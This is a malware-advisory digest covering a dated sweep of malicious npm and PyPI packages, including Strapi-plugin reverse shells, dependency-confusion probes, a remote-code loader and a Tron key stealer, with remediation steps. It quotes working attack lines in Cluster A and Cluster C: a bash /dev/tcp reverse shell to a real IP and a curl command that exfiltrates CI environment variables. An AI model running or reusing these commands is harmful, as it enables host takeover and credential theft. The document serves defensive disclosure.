GitHub Advisory malware sweep - 2026-09-16 late + 2026-09-17 (13x `strapi-plugin-*-meeb` port-80 hostname-gated (`ubuntu-fc-uvm`) reverse-shell follow-on to 14.225.210.85:80; `strapi-plugin-osag`/`os-rec` Burp Collaborator OOB recon; `@traktis/environment` + `@traktis/core` dep-confusion pair to `tko.amgsec.com`; `process-mite` npoint.io remote-code loader sibling of `process-lhpm`; `jexkcode` Baileys WhatsApp newsletter-follower; `kartyk-github-*` CWE-506 pentest artefacts; pip `praetorian-mind-rce-test-2026` env exfil + `trongappy` Tron key stealer + `rak-lab-yoav-orca-*` dep-confusion; npm `idx_form_script@999.0.4` 2026-09-17 dep-confusion probe)
GHSA 2026-09-16 late + 2026-09-17: 13 more strapi-plugin-*-meeb reverse-shell packages targeting 14.225.210.85:80 with ubuntu-fc-uvm hostname gating; -osag/-os-rec Burp Collaborator OOB recon variants from the same operator; @traktis/environment+@traktis/core dep-confusion pair exfiltrating CI env vars to tko.amgsec.com; process-mite reuses the same api.npoint.io loader as yesterdays process-lhpm; jexkcode` is another Baileys newsletter-follower.
- Incident type
- Advisory sweep. A dated batch of GitHub Advisory Database malware entries collected together. A sweep mixes kinds - typosquats, dependency-confusion probes, boilerplate takedowns with no published analysis, and occasionally real payloads - and its severity reflects the worst confirmed item, not the batch as a whole.
- Detected by
- GitHub Advisory Database · OpenSSF malicious-packages · OpenSSF Package Analysis · amazon-inspector
- Also known as
- 2026-09-17 GHSA npm+pip sweep · strapi-plugin-*-meeb port-80 hostname-gated wave (ubuntu-fc-uvm, 14.225.210.85:80) · strapi-plugin-osag/-os-rec Burp Collaborator OOB recon · @traktis dep-confusion pair (tko.amgsec.com env exfil) · process-mite api.npoint.io remote-code loader (process-lhpm sibling) · jexkcode Baileys WhatsApp newsletter-follower · kartyk-github-* pentest OIDC/token artefacts · idx_form_script 999.0.4 dep-confusion probe
- Ecosystems
- npmPyPI
- Packages tracked
- 28
What happened
Between roughly 2026-09-16 12:00 UTC and 2026-09-17 12:00 UTC, GitHub Advisory Database published 25+ new malware advisories (23 npm, 2 pip advisories that were not caught in yesterdays sweep; 1 npm advisory dated 2026-09-17). Todays batch is dominated by two operator continuities: the -meeb Strapi-plugin RCE operator moved to a hostname-gated :80 variant of yesterdays wave, and the api.npoint.io remote-code-loader operator republished the same payload under a new package name (process-mite vs yesterdays process-lhpm). New patterns: an @traktis dep-confusion pair with CI env-var exfil to a domain (amgsec.com) that reads as a real pentest firm, and a second Baileys-fork WhatsApp newsletter-follower (jexkcode after yesterdays plogme`).
Cluster A - 13x strapi-plugin-*-meeb port-80 hostname-gated reverse-shell follow-on
All 13 packages: v3.6.8, postinstall.js, C2 14.225.210.85:80, hostname gate os.hostname() === "ubuntu-fc-uvm", retry ≤5 attempts.
| Package | GHSA | Shell language | Extra IOC |
|---|---|---|---|
strapi-plugin-ccrec-meeb | GHSA-92rg-hf5c-qwp4 | bash /dev/tcp | — |
strapi-plugin-conresh-meeb | GHSA-wqj7-9999-2crf | bash /dev/tcp | /tmp/postinstall-revshell.log |
strapi-plugin-perev-meeb | GHSA-293w-xgv2-3qrj | python3 PTY | — |
strapi-plugin-pysh-meeb | GHSA-jxxh-j7pf-pvj3 | python3 PTY | — |
strapi-plugin-ccrev-meeb | GHSA-3r87-fhjr-5xhf | bash /dev/tcp | — |
strapi-plugin-feedmeeb | GHSA-chmf-v973-774w | bash /dev/tcp | hostname/user capture |
strapi-plugin-listcc-meeb | GHSA-5567-73jx-f7g3 | python3 PTY | — |
strapi-plugin-maylog-meeb | GHSA-p65g-47hv-5mfm | python3 PTY | /tmp/postinstall-revshell.log |
strapi-plugin-portcc-meeb | GHSA-p247-8vcf-jcm5 | python3 PTY | — |
strapi-plugin-persh-meeb | GHSA-x89g-768f-7xrv | python3 | port 443 fallback + /tmp/postinstall-revshell.log |
strapi-plugin-honey-meeb | GHSA-4373-h9cc-p2hr | python3 PTY | log lines "[+] Starting reverse shell" |
strapi-plugin-ccip-meeb | GHSA-8q85-7c4r-6v2c | bash /dev/tcp | — |
strapi-plugin-cccon-meeb | GHSA-75rj-xxh3-3j2q | bash /dev/tcp | — |
Operator continuity. Direct follow-on to multi-2026-09-16-ghsa-malware-sweep Cluster D (14 packages, same operator suffix -meeb/-meeb322k, same C2 14.225.210.85 but port :443, no hostname gate). Yesterday delivered mass reverse-shell coverage; today refines: a lower port (:80, which is more likely to be allowed outbound from restrictive CI networks) plus a hostname gate that keeps casual scanners dormant. The 13 name variants remain plausible Strapi plugin names:
ccrec/ccrev/ccip/cccon— plausible Strapi commerce plugin family namesfeedmeeb— plausible Strapi feed plugin (typo-inclusive fusion offeed+ operator suffix)listcc/portcc— plausible list/port CC (credit card?) plugin nameshoney— plausible honeypot/monitoring pluginmaylog/perev/pysh/persh/conresh— plausible logging/auth plugin names
A Strapi developer allowing bare-name resolution can still hit one of these by name-guess.
Cluster B - strapi-plugin-osag + strapi-plugin-os-rec Burp Collaborator OOB recon (same operator)
| Package | GHSA | Payload |
|---|---|---|
strapi-plugin-osag | GHSA-6jhp-v2xp-285p | HTTP GET to http://8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com/?<hostinfo> |
strapi-plugin-os-rec | GHSA-q676-3wp5-xm49 | HTTP GET to http://8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com/osinfo?<hostinfo> |
Both exfiltrate hostname, os.type, os.platform, os.arch, os.release, os.userInfo().username, os.homedir(), and os.networkInterfaces() as query parameters. Same operator naming convention as Cluster A (-meeb-family Strapi-plugin masquerade) but the payload is a passive Burp Collaborator OOB beacon, not a shell. This mirrors the 2026-09-15 Cluster H beacon (os-info-meeb322k, strapi-plugin-os-info-meeb322k — same Burp Collaborator domain family) — the operator continues to run parallel recon and RCE payloads under closely-related names, so that a defender who blocks one class misses the other.
Cluster C - @traktis/environment + @traktis/core dep-confusion pair to tko.amgsec.com
| Package | Version | GHSA | Endpoint |
|---|---|---|---|
@traktis/environment | 99.99.1, 99.99.2 | GHSA-8w76-frwh-rcpm | http://tko.amgsec.com/depconf/traktis-environment/ |
@traktis/core | <=99.99.2 | GHSA-968f-vpg2-j5xr | http://tko.amgsec.com/depconf/traktis-core/ |
Both manifest preinstall AND postinstall scripts curl the endpoint with:
curl "http://tko.amgsec.com/depconf/traktis-{environment|core}/?who=$(whoami)&host=$(hostname)&pwd=$(pwd)&t=$(date +%s)&env=$(env | grep -E 'GITHUB__|CI_PROJECT|JENKINS_URL|BUILD_URL|GITLAB__|RUNNER_|HOSTNAME|USER|HOME' | base64)"Sentinel version 99.99.x is a classic dep-confusion resolution-attack version choice. Scope @traktis reads as an internal enterprise scope. amgsec.com — plausibly AMG Security or similar — the depconf/ URL path is a self-labelled dependency-confusion probe endpoint, so this is most likely a pentest engagement`s probes leaking to public npm. That does NOT reduce the harm: any host that installed the package sent its entire CI environment (including OIDC tokens, cloud IAM keys, build-runner secrets) to a third-party endpoint. Treat those secrets as leaked.
Cluster D - process-mite npm remote-code loader (api.npoint.io sibling of process-lhpm)
process-mite@<=1.1.79 (GHSA-vgjx-m4jg-wrvq) is a direct behavioural sibling of yesterdays process-lhpm (multi-2026-09-16-ghsa-malware-sweep Cluster E). Same trigger (require() auto-invokes initialize()), same detached-child-process pattern, same npoint.io URL (https://api.npoint.io/33e8d008c334b060adad), same eval pattern (base64 decode of a code field). The package.json advertises getRuntimeInfo and calls the module "runtime-utils"; the actual index.js has none of the advertised functionality and inline comments identify the module as a remote-code-execution client. **--ignore-scripts does not block this** — the trigger is require`, not install.
Operator republishes the same loader under a new name within 24h, which lines up with the takedown speed on process-lhpm. Every previously-seen process-* npm package tied to the same npoint.io URL should be on your denylist proactively.
Cluster E - jexkcode npm Baileys WhatsApp newsletter-follower
jexkcode@1.0.1/1.1.0/1.1.1/1.1.2/1.1.3/1.1.4 (GHSA-g9xj-rjfw-h7h6). On any authenticated WhatsApp Web socket, the package auto-invokes newsletterFollow on a hardcoded WhatsApp newsletter JID 3 seconds after connection opens — no user consent, no configuration option to disable. Versions 1.0.1 through 1.1.4 progressively remove console-log messages that would have exposed the behaviour; 1.1.4 is fully silent.
Direct behavioural sibling to yesterdays plogme (multi-2026-09-16-ghsa-malware-sweep Cluster A) — same "malicious Baileys fork forcing newsletter subscription for growth-hack purposes" pattern, but without the crysnovax.link fingerprinting. Not confirmed as the same operator (different C2 fingerprint), but the tactic and target (WhatsApp automation developers) are identical. The two packages together indicate a small cottage industry of Baileys forks whose only "value-add" is forced newsletter growth for the publishers WhatsApp channels.
Cluster F - kartyk-github-* npm CWE-506 pentest OIDC/token artefacts
| Package | Versions | GHSA |
|---|---|---|
kartyk-github-single-ver-pkg | >=0 | GHSA-4vpr-3r9p-p9fh |
kartyk-github-token-pkg | 1.0.3, 1.0.4 | GHSA-4rmp-vchm-9gvg |
kartyk-github-oidc-test-pkg | 1.0.1, 1.0.2, 1.0.4 | GHSA-4vxh-7998-9h4g |
All three carry the CWE-506 "any computer that has this package installed should be considered fully compromised" GHSA boilerplate with no published payload analysis. Names read as red-team engagement test artefacts (prod-oidc-test-pkg, token-pkg, single-ver-pkg) under a kartyk-github- scope prefix — clearly related to yesterdays kartykp-prod-oidc-test-pkg/kartykp-token-pkg (multi-2026-09-16-ghsa-malware-sweep Cluster H, only difference is the trailing "p" on the scope prefix). Same actor, expanding the test-artefact set. Treat as medium` pending analysis.
Cluster G - pip pentest/dep-confusion probes + one Tron crypto stealer
| Package | Versions | GHSA | Payload |
|---|---|---|---|
praetorian-mind-rce-test-2026 | 0.0.1, 0.0.2, 0.0.3 | GHSA-8gcf-3vx7-2wrq | env vars + cloud tokens exfil, campaign 2026-09-praetorian-mind-rce-test-2026 |
rak-lab-yoav-orca-zrktd2cp5hjmo4x7 | 9.9.9 | GHSA-2mp7-443g-cw4c | IP + username via setup.py install hook, campaign GENERIC-standard-pypi-install-pentest |
trongappy | 0.0.1 | GHSA-xr9j-54f9-pcpm | TRX private-key stealer, campaign 2025-04-tronix, mimics README of legitimate TRX libraries |
praetorian- is Praetorian Security, a real pentest firm — the package is self-labelled as their engagements "rce-test" artefact. The exfil is real: env vars and cloud tokens go to whatever endpoint Praetorians engagement uses. rak-lab-yoav-orca-* is a self-labelled dep-confusion "internal test" (internal test of dependency confusion verbatim in the advisory). trongappy is the odd one out — an actual, non-pentest crypto-wallet-drain package targeting Tron (TRX) blockchain developers.
Cluster H - misc CWE-506 boilerplate takedowns
pkg-rollback-dreed-viced-sonic-ponds(GHSA-63f3-rmrf-6m9q) — no payload analysis, no IOC, CWE-506 boilerplate only.bender-rspack-config@<=1.0.0(GHSA-xq97-9c5h-5m43) — OpenSSF Package Analysis flagged for "executes one or more commands associated with malicious behavior"; no specific IOC.
Both medium pending payload analysis.
Cluster I - 2026-09-17 npm idx_form_script@999.0.4 dep-confusion probe
idx_form_script@999.0.4 (GHSA-82rh-9f4r-4739, OpenSSF campaign MAL-2026-16243). Only 2026-09-17 npm malware advisory today. Version 999.0.4 is a classic dep-confusion resolution-attack sentinel. OpenSSF Package Analysis flagged for "communicates with a domain associated with malicious activity" but no specific C2 host or hash published in the advisory beyond the source hash 59d074c4d6bd941d9586764043d556a83d301711c58eb661d57d63fa06ebec60. Name reads as an internal script (idx_form_script = index-form-script?). Treat as a plausible dep-confusion probe against a real internal name.
Cross-operator patterns worth flagging
- The
-meeboperator is now on day 3 of a recon-then-RCE cycle (2026-09-15 Burp Collaborator recon → 2026-09-16 port-443 reverse shells → 2026-09-17 port-80 hostname-gated reverse shells + parallel Burp recon variants). Denylist proactively. - The
api.npoint.ioremote-code operator republishes yesterday`s takedown under a new name.process-lhpm(2026-09-16) →process-mite(2026-09-17), same endpoint. Blockapi.npoint.ioat CI/host egress — the loader survives every takedown by rebranding. - Baileys-fork WhatsApp newsletter-follower cottage industry.
plogme(2026-09-16) +jexkcode(2026-09-17) are two separate publishers running the same forced-newsletter-follow tactic; the WhatsApp automation ecosystem has an operator class that is going after Baileys developers specifically. - Pentest artefacts are leaking to public registries at scale.
kartyk-github-*/kartykp-*npm pluspraetorian-mind-rce-test-2026andrak-lab-yoav-orca-*pip — four separate engagement leftovers with real exfil payloads inside 48h. Treat these as medium severity (limited real-world targets) but assume a leaked engagement`s captured secrets are effectively public.
Registry state
All packages above are flagged as malware on npm and PyPI and quarantined at the time of writing. Private mirrors that cached the tarballs before quarantine keep serving the malicious versions; network-edge egress blocks on 14.225.210.85, 8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com, tko.amgsec.com, and api.npoint.io are the durable mitigation.
Discovery credits
GitHub Advisory Database, OpenSSF malicious-packages, OpenSSF Package Analysis. Per-package IOC details drawn verbatim from GHSA advisory bodies published between 2026-09-16 12:00 UTC and 2026-09-17 12:00 UTC.
Affected packages (28)
- npm@traktis/core<=99.99.2
- npm@traktis/environment99.99.199.99.2
- npmbender-rspack-config<=1.0.0
- npmidx_form_script999.0.4
- npmjexkcode1.0.11.1.01.1.11.1.21.1.31.1.4
- npmkartyk-github-oidc-test-pkg1.0.11.0.21.0.4
- npmkartyk-github-single-ver-pkg>=0
- npmkartyk-github-token-pkg1.0.31.0.4
- npmpkg-rollback-dreed-viced-sonic-ponds>=0
- PyPIpraetorian-mind-rce-test-20260.0.10.0.20.0.3
- npmprocess-mite<=1.1.79
- PyPIrak-lab-yoav-orca-zrktd2cp5hjmo4x79.9.9
- npmstrapi-plugin-cccon-meeb3.6.8
- npmstrapi-plugin-ccip-meeb3.6.8
- npmstrapi-plugin-ccrec-meeb3.6.8
- npmstrapi-plugin-ccrev-meeb3.6.8
- npmstrapi-plugin-conresh-meeb3.6.8
- npmstrapi-plugin-feedmeeb3.6.8
- npmstrapi-plugin-honey-meeb3.6.8
- npmstrapi-plugin-listcc-meeb3.6.8
- npmstrapi-plugin-maylog-meeb3.6.8
- npmstrapi-plugin-os-rec<=3.6.8
- npmstrapi-plugin-osag3.6.8
- npmstrapi-plugin-perev-meeb3.6.8
- npmstrapi-plugin-persh-meeb3.6.8
- npmstrapi-plugin-portcc-meeb3.6.8
- npmstrapi-plugin-pysh-meeb3.6.8
- PyPItrongappy0.0.1
These are usually pulled in as transitive dependencies rather than installed directly. Check your whole tree at once - it runs in your browser and nothing is uploaded.
Impact
- *Cluster A — 13x `strapi-plugin--meeb
port-80 hostname-gated (ubuntu-fc-uvm) reverse-shell follow-on to14.225.210.85:80**:strapi-plugin-ccrec-meeb,-conresh-meeb,-perev-meeb,-pysh-meeb,-ccrev-meeb,-feedmeeb,-listcc-meeb,-maylog-meeb,-portcc-meeb,-persh-meeb,-honey-meeb,-ccip-meeb,-cccon-meeb— all v3.6.8, allpostinstall.jspayload, split roughly evenly betweenbash -i >& /dev/tcp/14.225.210.85/80 0>&1andpython3 -c ...pty.spawn("sh")reverse-shell variants. **All 13 gate onos.hostname() === "ubuntu-fc-uvm"before firing** — a distinct evasion tactic that keeps sandbox scanners and generic developer laptops dormant while detonating on the operators intended CI runner naming convention. Direct continuation of yesterdays Cluster D (14 packages, same operator suffix-meeb, but yesterdays were port:443with no hostname gate). Same C2 (14.225.210.85), one port down, plus a targeting refinement. Some (strapi-plugin-conresh-meeb,-maylog-meeb,-persh-meeb) additionally log to/tmp/postinstall-revshell.log— a marker that survives even a failed connection attempt.strapi-plugin-persh-meebalso references port 443 as a fallback - Cluster B —
strapi-plugin-osag+strapi-plugin-os-recnpm Burp Collaborator OOB recon variants from the same-meeboperator (no shell, HTTP GET reconnaissance):strapi-plugin-osag@3.6.8(GHSA-6jhp-v2xp-285p) andstrapi-plugin-os-rec@<=3.6.8(GHSA-q676-3wp5-xm49). Same postinstall trigger and same operator naming convention as Cluster A, but the payload is an HTTP GET tohttp://8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com/osinfo?...(Burp Collaborator OOB subdomain) with query parameters carrying hostname, OS type/platform/arch/release, username, home dir, and full network interface enumeration. No shell — passive reconnaissance to build target maps of the operators hostname-gated Cluster A hits. Confirms the operator continues to run a parallel recon-then-RCE cycle: yesterdays 2026-09-15 Cluster H was Burp Collaborator recon (os-info-meeb322k,strapi-plugin-os-info-meeb322k), 2026-09-16 Cluster D was RCE, and today the operator layers both patterns in the same 24h window - Cluster C —
@traktis/environment+@traktis/corenpm dep-confusion pair with CI env-var exfil totko.amgsec.com(pre+postinstall):@traktis/environment@99.99.1/99.99.2(GHSA-8w76-frwh-rcpm) and@traktis/core@<=99.99.2(GHSA-968f-vpg2-j5xr). Both preinstall AND postinstall lifecycle scripts curlhttp://tko.amgsec.com/depconf/traktis-environment/andhttp://tko.amgsec.com/depconf/traktis-core/respectively with query parameters carryingwhoami, hostname, cwd, timestamp, and a base64-encoded dump of every environment variable matchingGITHUB__*,CI_PROJECT,JENKINS_URL,BUILD_URL,GITLAB__*,RUNNER_*,HOSTNAME,USER,HOME. Classic dep-confusion sentinel version pattern (99.99.x) — the scope@traktisreads as an internal enterprise scope name.amgsec.com(AMG Security) is most plausibly a pentest firm domain; thedepconf/path in the URL is a self-labelled dependency-confusion probe. Treat as a real pentest artefact and a functional credential harvester — any host that installed these leaked its full CI environment to the pentest firm`s endpoint, and if that endpoint is later compromised, the leak becomes public - Cluster D —
process-mitenpm remote-code loader reusing yesterdaysapi.npoint.ioendpoint (runs onrequire`, not install):process-mite@<=1.1.79(GHSA-vgjx-m4jg-wrvq). Onrequire("process-mite")the auto-invokedinitialize()spawns a detachednode loader.jsprocess, which HTTPS-fetcheshttps://api.npoint.io/33e8d008c334b060adad, base64-decodes thecodefield of the returned JSON, and evaluates it withnew Function(). Same npoint.io URL as yesterdaysprocess-lhpm` (multi-2026-09-16-ghsa-malware-sweep Cluster E) — same operator, same mutable remote-code hosting bucket, different package name. Falsely advertises itself as a "runtime-utils" library; declared exports (getRuntimeInfo, etc) are absent.--ignore-scriptsdoes NOT block this — the trigger isrequire, not install-time - Cluster E —
jexkcodenpm Baileys WhatsApp newsletter-follower (unauthorised WhatsApp account modification, progressive log-stripping across versions):jexkcode@1.0.1/1.1.0/1.1.1/1.1.2/1.1.3/1.1.4(GHSA-g9xj-rjfw-h7h6). On any authenticated WhatsApp Web socket the package auto-invokesnewsletterFollow3 seconds after connection, forcing the user account to follow a hardcoded newsletter JID with no opt-out or configuration. Versions 1.0.1→1.1.4 progressively strip console-log messages that would have exposed the behaviour — 1.1.4 is fully silent. Direct behavioural sibling to yesterdaysplogme` (multi-2026-09-16-ghsa-malware-sweep Cluster A) — same Baileys-fork tactic, same forced-newsletter-follow abuse. Not confirmed to be the same operator (no shared C2 domain), but the tactic and target ecosystem (WhatsApp automation devs) are identical - *Cluster F — `kartyk-github-
npm CWE-506 pentest OIDC/token test artefacts (no published payload analysis)**:kartyk-github-single-ver-pkg@>=0(GHSA-4vpr-3r9p-p9fh),kartyk-github-token-pkg@1.0.3/1.0.4(GHSA-4rmp-vchm-9gvg),kartyk-github-oidc-test-pkg@1.0.1/1.0.2/1.0.4(GHSA-4vxh-7998-9h4g). Closely follow yesterdayskartykp-prod-oidc-test-pkg/kartykp-token-pkgpair (multi-2026-09-16-ghsa-malware-sweep Cluster H) — dropped the trailing "p" from the scope prefix (kartykp→kartyk-github), otherwise same naming convention (prod-oidc-test-pkg,token-pkg,single-ver-pkg). Almost certainly a red-team engagement`s serialised test packages that leaked into npm public. GHSA carries only the CWE-506 boilerplate — no IOC published - Cluster G — pip pentest/dep-confusion probes with real env exfil (
praetorian-mind-rce-test-2026) and a Tron key stealer (trongappy):praetorian-mind-rce-test-2026@0.0.1/0.0.2/0.0.3(GHSA-8gcf-3vx7-2wrq) — self-labelled Praetorian (real pentest firm) test package that exfiltrates environment variables and cloud tokens; carries the2026-09-praetorian-mind-rce-test-2026OpenSSF campaign tag.rak-lab-yoav-orca-zrktd2cp5hjmo4x7@9.9.9(GHSA-2mp7-443g-cw4c) — self-labelled "internal test of dependency confusion" campaignGENERIC-standard-pypi-install-pentest, exfils IP+username.trongappy@0.0.1(GHSA-xr9j-54f9-pcpm) — Tron/TRX private-key stealer,2025-04-tronixcampaign, mimics legitimate TRX library READMEs. First two are pentest artefacts, third is a real crypto-wallet drain - Cluster H — misc CWE-506 boilerplate takedowns (no published payload):
pkg-rollback-dreed-viced-sonic-ponds@>=0npm (GHSA-63f3-rmrf-6m9q),bender-rspack-config@<=1.0.0npm (GHSA-xq97-9c5h-5m43, OpenSSF Package Analysis flagged as "executes commands associated with malicious behavior" with no further detail). Treat asmediumpending analysis - Cluster I — 2026-09-17 npm
idx_form_script@999.0.4dep-confusion probe (OpenSSF Package Analysis):idx_form_script@999.0.4(GHSA-82rh-9f4r-4739, OpenSSF campaignMAL-2026-16243). Classic dep-confusion sentinel version (999.x.x). OpenSSF Package Analysis flagged for communicating with "a domain associated with malicious activity" but no specific C2 host/IP published in the advisory. Nameidx_form_scriptreads as an internal script name — plausibly a dep-confusion probe against a real internal form-indexing helper
What to do
- 1Grep every
package-lock.json,yarn.lock,pnpm-lock.yaml,package.json, and Strapi custom-plugin config in your org for every package name in Clusters A through I. Uninstall on hit, wipenode_modules, delete the lockfile, rebuild against a clean cache. Clusters A, B, C, D, E, G include real payloads (reverse shells, Burp beacons, env-var exfil, remote-code loaders, WhatsApp account modification, crypto key theft) — a hit is a compromise, not a warning - 2*For Cluster A `strapi-plugin--meeb
(:80 hostname-gated wave)**: any CI runner namedubuntu-fc-uvmthat rannpm installfor one of the 13 names had an interactive shell on14.225.210.85:80during install. Hosts with a different hostname escaped this batch, but the presence of the package in a lockfile still indicates operator interest. Treat anyubuntu-fc-uvmrunner as compromised: reimage, rotate every credential accessible from that runner, and rename the runner hostname pattern going forward so the hostname gate no longer matches. Block14.225.210.85at egress, and extend your denylist of-meeb/-meeb322knames — the operator escalated from single-port :443 wave (2026-09-16) to :80 + hostname-gate variant (today) within 24h, so treat any futurestrapi-plugin-*-meeb` name as adversary-controlled - 3For Cluster B
strapi-plugin-osag/-os-rec: passive recon only — no shell established — but a hit means your host details (hostname, OS, network interfaces, username) were sent to a Burp Collaborator subdomain the operator controls. Rotate CI credentials as a precaution, uninstall, and add the8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.comBurp OOB domain to your egress denylist. Any Strapi CMS developer allowing bare-name plugin resolution should switch to an explicit allowlist - 4For Cluster C
@traktis/environment+@traktis/core: any host that installed either package leaked its full CI environment (GitHub OIDC, GitLab tokens, Jenkins BUILD_URL, RUNNER_* secrets) totko.amgsec.com. Rotate every environment-based secret on the affected host. If you maintain an internal@traktisscope, pin it to your internal registry with.npmrcand configure the registry to refuse public-npm publishes under the same scope.amgsec.commay be a legitimate pentest firm domain — check whether you commissioned the engagement; either way, rotate exposed credentials - 5For Cluster D
process-mite:--ignore-scriptsdoes NOT block this — the loader runs onrequire("process-mite"), not install. Sameapi.npoint.io/33e8d008c334b060adadendpoint as yesterdaysprocess-lhpm, so blockingapi.npoint.io` at egress covers both packages. Kill any detached Node process fetching from that URL, remove the package, rotate every credential the parent Node process could have touched - 6For Cluster E
jexkcode: any WhatsApp bot runningjexkcodehas silently subscribed the user WhatsApp account to a publisher-controlled newsletter. Uninstall the package, unfollow the newsletter manually from the WhatsApp Web session, pin the real@whiskeysockets/baileyspackage explicitly, and treat anyjexkcode-published npm package as adversary infrastructure - 7*For Cluster F `kartyk-github-
**: uninstall on hit, rotate env values as a precaution. No host-forensics response required beyond routine credential-rotation prudence. Same posture as yesterdayskartykp-*Cluster H - 8For Cluster G (pip):
pip uninstall praetorian-mind-rce-test-2026 rak-lab-yoav-orca-zrktd2cp5hjmo4x7 trongappyand rotate any secrets present inprocess.envduring apip installthat hit one of these. Any host that importedtrongappyand had TRX wallet private keys in memory or on disk should treat those keys as stolen. For internal PyPI names, pin your internal registry with--index-urland--extra-index-urlorder or use a hash-pinnedrequirements.txt - 9For Clusters H, I (CWE-506 boilerplate +
idx_form_script): uninstall on hit, rotate env values as a precaution. Full payload analysis has not been published — treat asmediumand re-check the GHSA advisory over the next few days in case Amazon Inspector or a security-vendor blog publishes IOCs - 10For every
npm installin CI, prefer--ignore-scriptsor an equivalent lockfile-consumer mode that blocks pre/post-install hooks. This blocks Clusters A, B, C, F, G, H entirely, but does NOT block Clusters D (require-time trigger) or E (WhatsApp connection trigger inside legitimate Baileys use) - 11Add every specific package name below to your internal private-registry deny-list for at least 30 days. Extend your existing
-meeb/-meeb322kscope pins to block any Strapi plugin name matching those suffixes even without a published GHSA. The-meeboperator is now on day 3 of a recon-then-RCE cycle (2026-09-15 Burp recon → 2026-09-16 port-443 reverse shells → 2026-09-17 port-80 hostname-gated reverse shells + parallel Burp recon variants) — proactive denylisting saves you from tomorrow`s escalation
References
- GitHubGitHub Advisory Database - recent malware advisoriesgithub.com
- GitHubGHSA-82rh-9f4r-4739 - idx_form_script (Cluster I - 2026-09-17 dep-confusion probe)github.com
- GitHubGHSA-92rg-hf5c-qwp4 - strapi-plugin-ccrec-meeb (Cluster A - hostname-gated reverse shell)github.com
- GitHubGHSA-wqj7-9999-2crf - strapi-plugin-conresh-meeb (Cluster A)github.com
- GitHubGHSA-293w-xgv2-3qrj - strapi-plugin-perev-meeb (Cluster A)github.com
- GitHubGHSA-jxxh-j7pf-pvj3 - strapi-plugin-pysh-meeb (Cluster A)github.com
- GitHubGHSA-3r87-fhjr-5xhf - strapi-plugin-ccrev-meeb (Cluster A)github.com
- GitHubGHSA-chmf-v973-774w - strapi-plugin-feedmeeb (Cluster A)github.com
- GitHubGHSA-5567-73jx-f7g3 - strapi-plugin-listcc-meeb (Cluster A)github.com
- GitHubGHSA-p65g-47hv-5mfm - strapi-plugin-maylog-meeb (Cluster A)github.com
- GitHubGHSA-p247-8vcf-jcm5 - strapi-plugin-portcc-meeb (Cluster A)github.com
- GitHubGHSA-x89g-768f-7xrv - strapi-plugin-persh-meeb (Cluster A)github.com
- GitHubGHSA-4373-h9cc-p2hr - strapi-plugin-honey-meeb (Cluster A)github.com
- GitHubGHSA-8q85-7c4r-6v2c - strapi-plugin-ccip-meeb (Cluster A)github.com
- GitHubGHSA-75rj-xxh3-3j2q - strapi-plugin-cccon-meeb (Cluster A)github.com
- GitHubGHSA-6jhp-v2xp-285p - strapi-plugin-osag (Cluster B - Burp Collaborator OOB recon)github.com
- GitHubGHSA-q676-3wp5-xm49 - strapi-plugin-os-rec (Cluster B)github.com
- GitHubGHSA-8w76-frwh-rcpm - @traktis/environment (Cluster C - dep-confusion, tko.amgsec.com env exfil)github.com
- GitHubGHSA-968f-vpg2-j5xr - @traktis/core (Cluster C)github.com
- GitHubGHSA-vgjx-m4jg-wrvq - process-mite (Cluster D - api.npoint.io remote-code loader, sibling of process-lhpm)github.com
- GitHubGHSA-g9xj-rjfw-h7h6 - jexkcode (Cluster E - Baileys WhatsApp newsletter-follower)github.com
- GitHubGHSA-4vpr-3r9p-p9fh - kartyk-github-single-ver-pkg (Cluster F - CWE-506 pentest)github.com
- GitHubGHSA-4rmp-vchm-9gvg - kartyk-github-token-pkg (Cluster F)github.com
- GitHubGHSA-4vxh-7998-9h4g - kartyk-github-oidc-test-pkg (Cluster F)github.com
- GitHubGHSA-8gcf-3vx7-2wrq - praetorian-mind-rce-test-2026 (Cluster G - pip env exfil)github.com
- GitHubGHSA-2mp7-443g-cw4c - rak-lab-yoav-orca-zrktd2cp5hjmo4x7 (Cluster G - pip dep-confusion probe)github.com
- GitHubGHSA-xr9j-54f9-pcpm - trongappy (Cluster G - Tron private-key stealer)github.com
- GitHubGHSA-63f3-rmrf-6m9q - pkg-rollback-dreed-viced-sonic-ponds (Cluster H - CWE-506 boilerplate)github.com
- GitHubGHSA-xq97-9c5h-5m43 - bender-rspack-config (Cluster H - OpenSSF Package Analysis)github.com
- OpenSSFOpenSSF malicious-packages repositorygithub.com